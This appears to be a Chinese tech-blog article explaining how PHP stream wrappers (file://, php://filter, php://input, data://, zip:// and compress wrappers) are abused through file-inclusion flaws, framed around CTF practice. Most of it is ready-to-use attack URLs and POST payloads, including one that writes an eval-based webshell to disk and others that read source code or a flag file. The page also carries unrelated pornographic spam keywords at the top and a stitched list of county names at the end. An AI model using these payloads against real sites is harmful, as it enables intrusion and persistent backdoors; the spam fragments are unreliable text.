91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

怎么使用php偽協議實現命令執行

發布時間:2022-06-13 14:04:52 來源:億速云 閱讀:123 作者:iii 欄目:開發技術

今天小編給大家分享一下怎么使用php偽協議實現命令執行的相關知識點,內容詳細,邏輯清晰,相信大部分人都還太了解這方面的知識,所以分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后有所收獲,下面我們一起來了解一下吧。

1.file://協議

條件:

allow_url_fopen : off/on
allow_url_include: off/on

作用:

用于訪問本地文件系統,在ctf中通常用來讀取本地文件

include() / require() / include_once() / require_once() 參數可控的情況下,即使導入非.php文件,如shell.txt ,依然按照php語法進行解析,這是include()函數所決定的

說明:

file:// 文件系統是php使用的默認封裝協議,用于展示本地文件系統。

用法:

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext

示例:

1.file://[文件的絕對路徑和文件名]

http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

2.file://[文件的相對路徑和文件名]

http://127.0.0.1/include.php?file=./phpinfo.txt

3.http://網絡位置和文件名

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

2.php://協議

條件:

allow_url_open : off/on
allow_url_include: 僅 php://input  php://stdin php://memory php://temp 需要on

作用:

php:// 訪問各個輸入/輸出流 (I/O streams), 在ctf中經常使用的是 php://filter 和 php://input

php://filter 用于讀取源碼
php://input 用于執行php代碼

說明:

php提供了一些雜項輸入/輸出(IO)流,允許訪問 PHP 的輸入輸出流,標準輸入輸出流和錯誤描述符:

怎么使用php偽協議實現命令執行

php://filter使用:

php://filter/read=convert.base64-encode/resource=[文件名]

php://input的使用:

http://127.0.0.1/include.php?file=php://input
 [POST DATA部分]
<?php phpinfo(); ?>

寫入一句話

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

3.data://協議

作用:

php>=5.2.0 , 可以使用data://數據流封裝器,以傳遞相應格式的數據。通常用來執行php代碼

用法:

data://text/plain, ???

如:

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

4.zip:// & bzip:// & zlib:// 協議

作用:

zip:// & bzip:// & zlib:// 均屬于壓縮流,可以訪問壓縮文件中的子文件,更重要的是不需要指定后綴名,可以修改為任意后綴名,如 jpg,png,gif,xxx等

示例:

1.zip://[壓縮文件絕對路徑]%23[壓縮文件內的子文件文件名](# 的編碼為 %23)

壓縮 phpinfo.txt 為phpinfo.zip ,壓縮包重命名為 phpinfo.jpg ,并上傳

http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2.compress.bzip2://file.bz2

壓縮phpinfo.txt 為phpinfo.bz2 并上傳(同樣支持任意后綴名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

3.compress.zlib://file.gz

壓縮phpinfo.txt 為phpinfo.gz 并上傳(支持任意后綴名)

http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

總結

在ctf中常用的有data:// , php://input , php://filter ,file://

php://input ,data://用來執行命令
1.php://input 的用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
2.data://用法
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter,file://用來讀取文件
3.php://filter用法
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php(讀取php文件需要先加密以下才能讀出來)
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file://用法
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

以上就是“怎么使用php偽協議實現命令執行”這篇文章的所有內容,感謝各位的閱讀!相信大家閱讀完這篇文章都有很大的收獲,小編每天都會為大家更新不同的知識,如果還想學習更多的知識,請關注億速云行業資訊頻道。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

php
AI

旬阳县| 措勤县| 普洱| 泸定县| 台州市| 栖霞市| 彭州市| 库伦旗| 庆阳市| 金寨县| 桐梓县| 安康市| 永清县| 平湖市| 监利县| 丘北县| 永善县| 盐源县| 利川市| 天门市| 东海县| 沁阳市| 横峰县| 北安市| 邯郸县| 同心县| 黔西县| 石台县| 叙永县| 高密市| 苏尼特左旗| 青海省| 廉江市| 徐水县| 谢通门县| 夏津县| 常熟市| 那坡县| 屏山县| 永胜县| 鹤庆县|